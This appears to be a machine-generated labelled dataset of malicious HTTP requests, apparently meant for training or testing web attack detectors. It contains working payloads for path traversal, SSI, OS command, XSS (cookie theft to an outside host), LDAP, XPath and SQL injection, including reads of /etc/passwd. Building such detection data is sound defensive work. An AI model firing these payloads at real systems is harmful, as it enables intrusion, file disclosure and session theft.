Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45237
Start - Id: 45648
class: PathTransversal
GET /Mm4tmpx/e@ao0s0iv2/iVp9/detottoyeaz.swf?jrvisentl=daw&proGtsahLmidth=90963289&t7rNrpu1mye=samNoBtrnvto&eaeehesfkdo1mw=oM0yen&e8=trA0&eMnsriyiecrs=thosmr%40apsHj&ssSsdhhanhokiy=oss&lipetr9e=87094&@B2Spc6union=578637&isZe8ouesicoMit=ds+hn&sfe7mbhBpMmeaB=13401&ssehn0tlyso=0V0bcleimbou7&Tgroup bydo_Au=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fch%2Fseorveme%2Fistainit%2Faler.msf HTTP/1.0
Host: www.orllRl.it:80
Connection: iuaat
Accept: */*
Accept-Charset: koi8, cp-936;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 49.59.138.232
Cookie: replaceZDkD=25
Cookie2: $Version="427"
Date: Sun, 30 Apr 06 19:45:51 GMT
ETag: W/"TWLP.rty7psBz.X"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Sun, 05 Jun 05 11:03:30 UTC
If-Unmodified-Since: Wed, 10 Mar 10 22:57:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: rd2ie ndahl9=ttoh
Range: 6451-1616,73067-
Referer: /eaTsw/ucex/pwtrt/dewT.avi
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/1.2 (Windows; U; WinNT 1.9; mn-tm; rv:7.9.9) Gecko/26191129
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45648
Start - Id: 39411
class: SSI
GET /etcqQqfey916aZ/oXRm_XBwz9/Enr7d64galgnezetlCtE/nTN1wuiqu.AQ/Nn1dma.mdb?it=g3dMod&nondfe2nozm14s=90&un=Z1g%5Coiu+ARsr&9xjmt=%3C%21--%23email+fromhost%3D%22www.Tanwmupw.com%22+tohost%3D%22mailbox.uraly.com%22+message%3D%225hhpts+Gzq8seo+3R+tlJoii%22+fromaddress%3D%22eecg.com%22+toaddress%3D%22it7mt.sos5.com%22+subject%3D%22sn%22+sender%3D%22sc.com%22+replyto%3D%22tiuiei3.com%22+cc%3D%22o9L%22+inreplyto%3D%22lh+iOn+wthe%22+id%3D%22oomail%22+--%3E&sds7jmoRgyceg=icat1e&ghOhlg=3751&t3otohFlusbehh=ulhempt&eaa5m5i=21360&h62ngau=50 HTTP/1.0
Host: www.1mquihSh.it:80
Connection: keep-alive
Accept: image/png;q=0.4, video/mpeg, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: c-tr;q=0.0, ainncpe-dr;q=0.2, eaesfNht-gobm, at-utb, e-pj;q=0.5
Cache-Control: min-fresh=374
Client-ip: 123.202.136.228
Cookie: 3llYFX5yXUa=nYC;Cziodc=75550;etrut=sfl;mr=?t;iuwv=06143
Cookie2: $Version="9"
Date: Thu, 27 Jan 05 23:16:15 UTC
ETag: "gFaCTXTMM3uIhv8kx"
Expect: 100-continue
If-Modified-Since: Sun, 10 Feb 08 17:51:02 UTC
If-Unmodified-Since: Wed, 22 Feb 06 23:18:52 UTC
If-Match: *
If-None-Match: "1IrQSi9B47IhbBb"
If-Range: Tue, 06 Apr 10 04:58:08 UTC
Max-Forwards: 0
MIME-Version: 6.3
Pragma: ihcj=tCeaeit
Proxy-Authorization: Basic bG1uZWg3cDI6eXRkR3M=
Authorization: Basic c2kyQjpnb3Zp
Range: 747370-38132,5734-
Referer: /chao/2dymoZ/bhto/tbrask/yEbNA.php4
TE: trailers
Trailer: Via
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 1.0; rN-si; rv:0.3.0) Gecko/82820079
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-Color: color8
Via: ttk/1.9 www.snciFds.js, HTTP/0.9 10.224.148.192, qsyf/2.3 199.247.41.220
Transfer-Encoding: gzip
X-Serial-Number: 3653526354532
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39411
Start - Id: 43358
class: OsCommanding
GET /ienleb/cenwON/gtCellsebe7iyqetsEd/group bylibtwinnt0Nt/mcaayhsntmopsociewem/e7BdcyJb2@p8cQ_J7F/MYlibL7Q4mRzGO-/oeslum/a4fetso9b.jsp?pnU2nbo=izHE2klPTWla&efmdest=t7s&295Wp=diw&LcFtsX4iframepU=zr%3DAl&2ttcy0=9753&goecoea2=dtpewetig0&cadelsiras=151&ie=%27+++++%3B+++++ps+++-aux++%3B&sroieec8Nof=+%2Bchildry%3BnsO%7Ctfm%3Cactsu+&detsov=c%3Dyge&rEpetdrh=a3co8aR&eOaIalot=iib&zdaavdiC7houo=gxh HTTP/1.1
Host: www.wsnnmo3i.net
Connection: wresuff7
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0
Accept-Language: H-eaoioi;q=0.5, 6lkroS-TI, ioft0o-ats3gest;q=0.8, malg7oe-enc;q=0.9, e-ohaednh
Cache-Control: edtsFea='snei'
Client-ip: 156.10.128.233
Cookie: documentGSUcdd16cue=4g6$copyl;osntaas=zge;zLlNnteneiovro=tiaert;oGKG@=$ne;rfhdgct=i;Olqocfe9mt=3hqnn
Cookie2: $Version="89"
Date: Sun, 04 Sep 05 02:20:54 CET
ETag: W/"SCFxXxDdEo-NGRp"
Expect: seetl=mqbf
From: vpsly@coiheDy.uk
If-Modified-Since: Fri, 14 Dec 07 15:25:30 GMT
If-Unmodified-Since: Fri, 25 May 07 23:20:49 GMT
If-Match: "2ajYHQRZhzeOdMczo9RJ"
If-None-Match: "JdlgSzs1Qr4Eka-Lj"
If-Range: Sun, 28 Aug 05 15:03:23 GMT
Max-Forwards: 468
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: s706we eeedsr=aacN
Range: -44,21391-
Referer: http://uti1a.be/eibictO/eenaieo/SAimHedc/s1cad/fClD.jsp
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 7.1; ti-tv; rv:0.2.1) Gecko/05421496
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: FTP/9.4 77.44.210.238, HTTP/5.6 www.l7tleau2.png
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3255845056436088473
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43358
Start - Id: 45487
class: PathTransversal
GET /-qaoaFFr.js?teactnnHt=Zt&osrpytpfebdb=naStyo4kaljnrmtds&Ats=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&5ot0Eolai=afW&6hwneesgam=1bETE&tcbgsoundcopyVP3rQnph-oP=lt3Dnetcate+stylebin7S%25Ni HTTP/1.1
Host: 36.240.147.33
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312
Accept-Encoding: gzip, gzip;q=0.9, gzip;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 37.164.89.218
Cookie: eater=ezJJAPNzt7;havingrsVu_=421777660
Cookie2: $Version="39"
Date: Thu, 05 Oct 06 08:31:16 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Sat, 01 Sep 07 04:58:09 CET
If-Unmodified-Since: Mon, 24 Apr 06 09:12:11 UTC
If-Match: "P81d2kSqq7XukJFVE"
If-None-Match: *
If-Range: *
Max-Forwards: 237
MIME-Version: 3.1
Pragma: e=r3otnee
Proxy-Authorization: NTLM c2ExZTZ0YWlkZG9MNmxnb2loZWJlb3RzZGJ3UGxscnZ1ZWVlbG9zem5ldG9sZXRo
Authorization: Basic ZWNzbGg6bGRpZWZq
Range: 7-
Referer: /5Oatb/ilemheac.conf
TE: trailers
Trailer: Expect
User-Agent: soNLiPrkQ http://www.er9evp.st
UA-CPU: PowerPC
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: 5.1 www.truEqua.gif, 1.2 www.oHurtr.shtml, FTP/9.4 www.oLlaoa.jpeg
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 224.80.9.55
X-Serial-Number: 49844
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45487
Start - Id: 47038
class: XSS
GET /sOmAev3qm4pKiPr6iMaN/hpsysiiy/HTqREGIkqsystemcrv/05insertcI.2vv2/0aeayo/yA1X1-usock_streamY-/llSR.xclne1Wc3PXO65.swf?5ish4oyw=E+rml1ndt&Ah2etnh40e=%3C%21%5BCDATA%5B%3C%21--%5D%5D%3E%3Cscript+%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.olnsnesi.com%2Fcgi-bin%2Farorlise.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&jA@6=emu&sFtglBour=6wen&cmdkXSduuscriptpk=u+ps5a%28eho HTTP/1.0
Host: 13.239.213.129:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp;q=0.3, iso-8859-4;q=0.3, iso-8859-6
Accept-Encoding: compress;q=0.5, deflate, compress;q=0.7, gzip;q=0.9, compress;q=0.6
Accept-Language: *
Cache-Control: max-age=07123
Client-ip: 71.223.100.67
Cookie: rtriiIlns=x4;odot=nhkq)'cv\hvi;etrHr=bcxHCe4B_8z;aoi=27;sjme1=5O2FT_xwpS
Cookie2: $Version="73"
Date: Thu, 01 Feb 07 15:07:44 GMT
ETag: W/"JuHxQWjnWQYZ_sTjN"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Fri, 16 Apr 04 17:49:42 UTC
If-Unmodified-Since: Thu, 16 Nov 06 09:26:28 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: *
If-Range: "d8zBZtD9r-Kt1cAB4fN"
Max-Forwards: 0721
MIME-Version: 5.6
Pragma: df='h'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: Digest algorithm=MD5
Range: -00740,898979-,21-
Referer: http://www.ee8b.biz/ethad/rbhh/mbelalo/tareaS6c/iw29y.js
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.1 (compatible; osaased; Linux i386; Hdro6nngsd; na4iUcchaO; wraaoutnye)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: 5.3 www.ekpaeiw.png, 8.5 228.221.200.118, 5.6 58.199.120.0
Transfer-Encoding: n6ea
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 182 www.tsTbr1.png "pkoij" "Thu, 09 Feb 06 08:59:39 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47038
Start - Id: 39195
class: SSI
POST /m-vQijR5YHN/baeh/TQxm@UzPy.gif? HTTP/1.0
Content-Length: 395
Content-Language: Srthfe,njeoi
Content-Encoding: gzip
Content-Location: /ln9f/utoeoast/oteo4xrs/dCeeesn.jpg
Content-MD5: bmRhYmhpeVVlY09pNG9nbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jun 06 10:05:37 GMT
Last-Modified: Tue, 15 Feb 05 20:13:48 CET
Host: www.eempqx.org
Connection: udxEltmr
Accept: audio/basic
Accept-Charset: x-mac-arabic, x-mac-japanese, x-mac-korean;q=0.9, windows-1253;q=0.7
Accept-Encoding: 
Accept-Language: e-onEthtl, gre-Toease, aLTaLa-i;q=0.7, ea6rY1ha-n;q=0.5, jam-faotrooo;q=0.0
Cache-Control: idUo='oae'
Client-ip: 166.155.8.248
Cookie: stc9vi=tfh\t ;rnz5nf5vcaioio=efwe-N
Cookie2: $Version="690"
Date: Tue, 04 Jul 06 12:34:30 UTC
ETag: W/"kvcPC.rwja1VSKiIHBI"
Expect: 100-continue
From: nGxh@nraae5E.gov
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Tue, 06 Dec 05 11:19:41 UTC
If-Match: *
If-None-Match: "buUy7ulYGta65KvPnS5"
If-Range: Sun, 16 May 04 14:18:59 UTC
Max-Forwards: 640
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: NTLM MlV6Zm9ucG1PZUdNaXRwc2xycUFmRWVzQXNBbnQwQngyeWFJ
Range: -6444
Referer: http://e6Sdii.gov/1biqo/ztoip.cfm
TE: gzip;q=0.3
Trailer: Proxy-Authorization
User-Agent: qicsrazwcTsu8si
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: 6tqha/7.2 245.79.134.118:94427, HTTP/4.9 www.piotT5aa.css
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ye=arEierneHm&JTFOUD=h7nyhalNn&oih4oot3moEo=<!--#email fromhost="www.repph0d.com" tohost="mailbox.krN7.com" message="s4iur OhnEt4 ltxeAeM i7h1s" fromaddress="ucetoT.com" toaddress="wrl5.vs.com" subject="o" sender="nb8s.com" replyto="cp8ee.com" cc="tMh" inreplyto="ifea8 7ffl Pnh" id="darpzmail" -->&cbta9tmbodsni=cOPYWC4n

End - Id: 39195
Start - Id: 38911
class: LdapInjection
GET /onwbwtnti/82ixetnoo/kt/nhd9Lml_i3ce/vooda/s8q_Hds/o3h3SPMrL/eOWZp-i7FHQuIL_sky/DL122ol.html?Lbodybv0WOCN_sm=8nft&45shol=53296394&n4u=n&mnmt=wdyet+Af&tDuOtrhms=2&eAsRiXV=ctsunion%28trza9e%25%5Cix&eopzryroasqnn=medo&tmpyinVpsFzeQ1u=%29+++%28+%7C++%28+++cn%3D*o++++%27brien*%29%28mail%3D*o++++%27brien*+%29+&jhtosknn=t_Is4552h HTTP/1.0
Host: 42.244.3.16
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: iso-2022-kr;q=0.3, cp-936
Accept-Encoding: compress;q=0.2, gzip;q=0.1, gzip
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 68.221.116.115
Cookie: _CWaDK=Rla;iAhdeitrUik=8
Cookie2: $Version="45"
Date: Sat, 14 Feb 04 16:38:06 GMT
ETag: W/"E8jHF1YpjxHTbtDDxA"
Expect: 100-continue
From: neenu@alestrhlsH.gov
If-Modified-Since: Sun, 20 Mar 05 22:52:35 UTC
If-Unmodified-Since: Sat, 21 Jun 08 08:30:30 CET
If-Match: "oGoXZrgLub7@borF5G"
If-None-Match: "L7CN2SfNtJQlPfAas."
If-Range: Mon, 25 Feb 08 19:37:38 GMT
Max-Forwards: 0
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: NTLM bmVvdHN0aWFveUllMXFhZnJueWltYmhub25obWRldGVnZWV3ZHQ5d2M=
Range: 979-,2-1
Referer: /n5nodn/niridho.css
TE: chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 9.3; Oh-l1; rv:5.0.8) Gecko/02420059
UA-Disp: 982,9974,16
UA-OS: Win95
Via: 6.7 113.233.112.39:36875, FTP/1.4 www.fcercqe.css
Transfer-Encoding: gzip
Upgrade: toues/6.2, Lrne/8.5, oec5E/9.4, eyhe/5.1, eneaoo/3.9
Warning: 239 www.vyh2ooi.js "ghiwstugdquhncr" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38911
Start - Id: 42964
class: OsCommanding
GET /dkmehcea2ol7eb/scriptrqy/uyUKXed/nzLgC1VEip_Fws.bin?iartpelutrhufde=osodt3scriptgroup+byM&OGVNVvbscriptT.h2iz=SieTpeha&rnimozoEgetw5s=20&O@jzkS8oNimgK=gzHihezt8eo&niesbefda=oXabetweenwlip&rkehtmem=ghL.4&FoLS=32537&molepbo=870 HTTP/1.0
Host: www.qratd4r.ch
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, macintosh;q=0.4, iso-8859-7, ks_c_5601-1987;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 162.231.56.83
Cookie: 41ik=63260;m4O0S1=09061;9c6UhQR=k;ed0sfnWcnn=w;tp=/../../../../../../../bin/cat  /etc/passwd |
Cookie2: $Version="940"
Date: Mon, 23 Jun 08 13:45:30 GMT
ETag: W/"mg6-z5rmN_exu3fsjr"
Expect: 100-continue
From: aaoq@n8t5el2e.org
If-Modified-Since: Thu, 02 Apr 09 19:54:15 UTC
If-Unmodified-Since: Mon, 21 May 07 23:58:27 GMT
If-Match: "PXkTobc6REBH_j0n"
If-None-Match: "hqQMPJqoasHMn-wxaz0"
If-Range: *
Max-Forwards: 895
MIME-Version: 5.1
Pragma: wTawc8='iSi'
Proxy-Authorization: Iosh iioNe11A=5tlqHb
Authorization: NTLM Y2VvYXQ2enQxdGFxcnpsYXNmZXl5b21hdXRhaHBsZWI=
Range: 39-,03043-9
Referer: /1cq36Alf.tiff
TE: gzip;q=0.6,trailers
User-Agent: xpVo0ptreaeEyetioe
UA-CPU: x86
UA-Disp: 702,4199,8
Via: 7.8 www.ecdao.shtml, 6.4 224.28.174.70:74892
Transfer-Encoding: wkasSe; ebl5h=airH
X-Forwarded-For: 145.166.242.21
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42964
Start - Id: 35755
class: XPathInjection
GET /8Ng./e_kKoVNpe3/fjU64nACVToCfMU/pE-niphp0a/Sd6linkJik/rcKesau1Tneto0o5Pht/MS-UXydtNYfX/c8otrtatacZblis3rnci/sREloti4lam/yifc.js?n80fieienh=bb-oqKoqv_PG&Ex5rmlogaR=apassthruey&ikweYnd=1&hStemlpo=eun%27%5D+++%7C++++P+++++%7C+++++%2F%2Fuser%5B+++++name%2Ftext%28+%29+%3D%27n0&tEhtoza=style&fe7xronswo9=esne5%5DmrE%7Cmruadminxito HTTP/1.0
Host: 225.105.148.61:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: utf-7, iso-8859-8;q=0.8, x-mac-chinesesimp, x-mac-greek;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 54.55.177.74
Cookie: imh6yeYte=c2qtis\id;63xterm.vC=Se;raaAusrleltr\g;5PkSunionlibI=childsgbtq;s3At0labodtr3=aFrc7ratne;tTN=87759
Cookie2: $Version="40"
Date: Tue, 24 Aug 04 17:09:06 GMT
ETag: W/"93dO5EHm@7LqEQZd"
Expect: ir13aesi=oye3fea;4ez86tn=EcuoTpy
From: nsEeee@gxtagow.be
If-Modified-Since: Fri, 21 Dec 07 21:47:20 GMT
If-Unmodified-Since: Tue, 20 Jan 09 17:04:50 CET
If-Match: "Rqk.CsPwaBTeNP_0"
If-None-Match: *
If-Range: Sun, 31 Jan 10 03:35:40 UTC
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest username="ectz2a"
Range: 912919-0,159182-1735
Referer: http://www.qadiesls.cz/wlnd/tomee/okms0i/adcirl/svAbh.aspx
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/9.8 (compatible; MSIE 7.4; WinNT; taTuhVyd; tMweroea)
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6100x360
Via: unsE/0.5 242.136.68.107:879, 9.2 www.naCna.png:9, Uea/0.8 www.eoDsn.html
Transfer-Encoding: deflate
Upgrade: Toa/4.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 040193563593
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35755
Start - Id: 44553
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.0
Host: 59.67.93.10:340
Connection: eiteu
Accept: video/*;q=0.0, video/quicktime, application/*;q=0.4
Accept-Charset: iso-8859-8, isiri-3342;q=0.7, euc-tw;q=0.2, euc-jp
Accept-Encoding: compress;q=0.3
Accept-Language: gc-sr, e9rioe-4
Cache-Control: min-fresh=7
Date: Mon, 18 May 09 13:45:36 GMT
If-Modified-Since: Wed, 04 Feb 04 01:42:59 UTC
Max-Forwards: 66
Referer: http://hTggng.cz/auEt9/yngtA/cspS/Rdepe.cgi
Trailer: TE
User-Agent: tiiHOPdwb/9.8
Transfer-Encoding: identity
Upgrade: espuu/7.2, r6na/8.2, ig2sm/1.6, ijuds5/8.2

null

End - Id: 44553
Start - Id: 36019
class: PathTransversal
GET /ahSf-gUh1vwm4FT.mspx?36ceUiiUne=4632136561&ie=ueselecte1hSt&ath=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&grl4e=226134716 HTTP/1.1
Host: www.j4teeeef5.cz:7
Connection: taent
Accept: */*
Accept-Charset: utf-8, koi8-r
Accept-Encoding: gzip, deflate, deflate;q=0.3, identity;q=0.3
Accept-Language: *
Cache-Control: min-fresh=6538
Client-ip: 236.32.209.129
Cookie: ft=rnnode3
Cookie2: $Version="1"
Date: Mon, 15 Mar 04 08:20:41 GMT
ETag: "1a58EMborIstQSXjUbu@"
Expect: ynaht
From: e1ea@teeopdrn.uk
If-Unmodified-Since: Tue, 01 Jan 08 03:35:08 CET
If-Match: *
If-None-Match: "8Xe4YpSVMFzaxu7"
If-Range: Thu, 13 Apr 06 22:09:09 GMT
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Basic aDZweXRoZTpCbDFpZXhheg==
Range: -05066,-92,-024075
Referer: /tnntiad9/Dadmni.jsp
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 8.9; aw-tn; rv:4.4.7) Gecko/37018216
UA-Color: color8
Via: 1.5 0.35.153.4:117, dnR/5.7 248.98.233.112, FTP/7.8 85.169.36.74
Transfer-Encoding: deflate
Warning: 366 209.231.92.237 "1njhsgaZmEo" "Fri, 29 Feb 08 20:21:14 CET"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36019
Start - Id: 42659
class: SqlInjection
GET /ikah3dleaetuRer6/x7g.GL/hkz2O562Pb22pV/3p8i/ehIrcsisoaef9siIr/f2.YP/ncAvKEKfT.asmx?Uvg7eHnnt=%3Dbad&rasuOre9eh=vfwo&lllnho=sN%40Iee&CsxfjjQH6=811625&2@v0=Focotl&hto=%3Balter++++table++toes++set+++++password+++++%3D+++++%27mtnjh%27++where++++name+++%3D+%27smtg%27%3B HTTP/1.0
Host: 173.202.38.167
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ariysatg-enr7esti, y5iisop-1Ye;q=0.2
Cache-Control: max-age=9
Client-ip: 146.94.72.186
Cookie: qq1ha2ftaaao=8229;z1EMR=i6OEP.2uc;ehO=9;rubdaonj9ojgp=ijaunsop~jttni
Cookie2: $Version="5"
Date: Sat, 29 Nov 08 06:39:49 UTC
ETag: W/"H.QakKmPwd7ntHNPLq"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Fri, 12 Oct 07 06:25:38 CET
If-Unmodified-Since: Wed, 26 Jul 06 05:27:54 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Aug 05 11:47:10 GMT
Max-Forwards: 451
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM YmRlaGVqSG5rYTlpc29yYXNkYXNkSW5FaDJsNmVlbXBvanBlcmlBeW5jbnNnemNl
Range: 339-5245,-077063
Referer: http://oh2Dh.net/anmoo/5dnnnc3d/hryrF.htm
TE: deflate,trailers,trailers
Trailer: Accept-Charset
User-Agent: rovScRil http://www.iIscws1.uk
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: deflate
Upgrade: ahhfl/7.8, chtwm/6.2
Warning: 774 214.83.139.96 "r6ayr1mfweno5w" "Sat, 12 Mar 05 11:07:06 UTC"
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 69822179
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42659
Start - Id: 40760
class: SSI
POST /pHMAbRWjGmJBZmRlh1/a@K6kxDUHKdGKi1GC/gwhh13floSae3imhea/hkehT9a/m0hBOP..shtml? HTTP/1.0
Content-Length: 252
Content-Language: l
Content-Encoding: gzip
Content-Location: http://netago9l.gov/rtnhed6R/ikau.pl
Content-MD5: NXlhdzI1b2FybHROc2d0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Mar 07 06:23:14 CET
Last-Modified: Mon, 29 Jun 09 05:43:41 GMT
Host: www.tirItzrab.fr
Connection: keep-alive
Accept: text/*, application/*
Accept-Charset: x-mac-japanese;q=0.8, windows-1254;q=0.5, iso-8859-8-i, windows-1250;q=0.2, shift_jis;q=0.0
Accept-Encoding: compress;q=0.6, gzip
Accept-Language: aoaq-hcne;q=0.7, e-n0;q=0.7, Tomis3c-Hn;q=0.6, miVe6Y-TvtsruAa;q=0.1, f7sasr6-he
Cache-Control: max-stale=3
Client-ip: 166.41.33.129
Cookie: ipe9Jm3=112815;NZn=pmeiss;Aeernepfae=tdsbajv2Dd 
Cookie2: $Version="570"
Date: Mon, 20 Apr 09 11:20:38 GMT
ETag: W/"FsK6X9uau3JVBqU"
Expect: 100-continue
From: alirg@hnsnaSx.uk
If-Modified-Since: Tue, 25 Apr 06 18:28:16 CET
If-Unmodified-Since: Fri, 14 Mar 08 23:03:28 GMT
If-Match: *
If-None-Match: "kqtHaqiIYu5K5uLb@f"
If-Range: *
Max-Forwards: 19
MIME-Version: 8.0
Pragma: a=rwagdaok
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Digest username="etfji"
Range: 21211-
Referer: http://www.suioom.net/sZczwNen/ye3srTt/sE1wono/alees/f6aivd.mp3
TE: trailers,chunked;q=0.4
Trailer: Connection
User-Agent: 9nC7/5.7.7
UA-CPU: MIPS
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: urtex/7.8 www.Sib1r.html, 3.6 70.226.250.186:394, 0.7 www.uhy2dur.gif
Transfer-Encoding: compress
Upgrade: etg/2.7
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

pepntwciuxi89p=9987&ssgeA3oobnlt=ol'o&ze=256607&aweas8iaatot=<!--  #odbc  statement    = "select  ttu,   urt6T,  plltj   from  sygion1wtp   order    by     3,   84, 9"    -->&3NndRp=7)aimse<m@]4ia9H&emi1NtelEwenee8=aqNOu

End - Id: 40760
Start - Id: 46122
class: PathTransversal
POST /twdetmgOc3/ZMsqlid/slVDEPH/52u2tariMaoehtqnrrn/3WM4Tiz8m/soYDk6aeeeFtDOmT.aspx? HTTP/1.1
Content-Length: 56
Content-Language: powwoeA,igne,o69iebH
Content-Encoding: deflate
Content-Location: http://deKre.net/n9enbI/eei5knje.tar
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 04 Oct 07 03:14:09 GMT
Host: 228.70.44.204
Connection: ajniiisa
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic, cp-936;q=0.2, cp-932, iso-8859-6;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Date: Fri, 12 Sep 08 09:23:05 CET
